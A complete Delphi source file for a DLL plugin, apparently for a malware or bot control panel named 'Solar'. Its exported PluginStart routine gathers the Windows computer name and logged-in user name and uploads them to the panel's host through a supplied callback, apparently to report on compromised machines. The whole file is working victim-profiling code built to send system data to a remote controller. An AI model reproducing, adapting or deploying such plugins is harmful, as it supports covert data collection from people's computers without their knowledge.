library ComputerInfo;

{ This Solar plugin uploads computer information
  to the current host of the panel}

uses
  Windows;

//Declare PluginData
Type
  pPluginData = ^tPluginData;
  tPluginData = packed record
    bMainProcess : Boolean;
    bWow64       : Boolean;
    sGUIDA       : array [0..39] of Char;
    UploadData   : Procedure(pUrl : Pointer; pData : Pointer);stdcall;
  end;

Procedure ZeroMem(pPointer : Pointer; dwLen : DWORD);stdcall;
//Zeroes Pointer -> Pointer+dwLen
var
  i : DWORD;
begin
  for i := 0 to (dwLen -1) do
    begin
      pByte(tHandle(pPointer) + i)^ := $00;
    end;
end;

Function PluginStart(pData : pPluginData):Boolean;stdcall;export;
var
  sComputerName : array [0..255] of Byte;
  sUserName     : array [0..255] of Byte;
  sBuffer       : array [0..511] of Byte;
  dwLen         : DWORD;
begin
  //Initialize
  ZeroMem(@sComputerName[0], 256);
  ZeroMem(@sUserName[0], 256);
  ZeroMem(@sBuffer[0], 512);

  //Get Computer Name
  dwLen := 256;
  Windows.GetComputerNameA(@sComputerName[0], dwLen);

  //Get User Name
  dwLen := 256;
  Windows.GetUserNameA(@sUserName[0], dwLen);

  //Create the data string
  Windows.lstrcatA(@sBuffer[0], @sComputerName[0]);
  Windows.lstrcatA(@sBuffer[0], pAnsiChar(AnsiString(#13#10)));
  Windows.lstrcatA(@sBuffer[0], @sUserName[0]);

  //Upload the data
  pData^.UploadData(@sComputerName[0], @sBuffer[0]);

  //Return True
  Result := True;
end;

Function PluginStop(pData : pPluginData):Boolean;stdcall;export;
begin
  //Return True
  Result := True;
end;

//Make the exports
exports PluginStart;
exports PluginStop;

begin

end.
